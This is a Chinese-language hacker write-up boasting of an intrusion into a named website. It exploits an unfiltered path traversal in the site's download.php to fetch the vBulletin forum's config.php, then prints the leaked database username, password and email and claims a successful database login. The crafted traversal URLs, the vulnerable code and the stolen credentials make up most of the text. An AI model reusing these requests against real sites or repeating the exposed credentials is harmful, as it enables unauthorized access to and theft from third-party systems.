by ≯Super·Hei (sex.cnse8.com)
问题出在下载系统的download.php
我们访问:http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt
呵呵 !! 看到./你会想到什么 :)
http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt
返回:
Warning: readfile(): Unable to access ../www.ChinaSafe.org.txt in /usr/home/cnwill/soft/download.php on line 35
Warning: readfile(../www.ChinaSafe.org.txt): failed to open stream: Invalid argument in /usr/home/cnwill/soft/download.php on line 35
看来使用的是readfile(),去下个原文件看看先,
入侵www.cnwill.com
。download.php代码:$extensie = strrchr($_GET[fname], ".");
if (!in_array(substr($extensie, 1), $not_to_be_dloaded)) {
// the source file is output
readfile($_GET[fname]);
} else {
// message when downloading a forbidden file
echo "$msg_not_allowed";
}
?>
对fname没有过滤.和/ 看来我们可以readfile所有的文件拉 哈哈~~~
目标得到论坛config.php,呵呵~~ 其他的好象都是文本数据的 。
看看论坛 Powered by: vBulletin Version 2.2.8
提交http://www.cnwill.com/forum/readme.txt 返回readme.txt的内容,看来存在readme.txt
我们回到download.php,提交:
http://www.cnwill.com/soft/download.php?fname=./../forum/readme.txt 哈哈!!
成功返回 胜利就在眼前拉,
电脑资料
《入侵www.cnwill.com》(https://www.unjs.com)。提交http://www.cnwill.com/soft/download.php?fname=./../forum/admin/config.php
哈哈 出现个下载提示,用网快下载后打开:
/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////
// type of database running
// (only mysql is supported at the moment)
$dbservertype=mysql;
// hostname or ip of server
$servername=localhost;
// username and password to log onto db server
$dbusername=cnwill;
$dbpassword=54safer;
// name of database
$dbname=cnwill;
// technical email address - any error messages will be emailed here
$technicalemail=54safer@163.com;
// use persistant connections to the database
// 0 = dont use
// 1 = use
$usepconnect=0;
?>
呵呵 用sql连接成功,hoho 以下的事是体力活。。呵呵 不想干了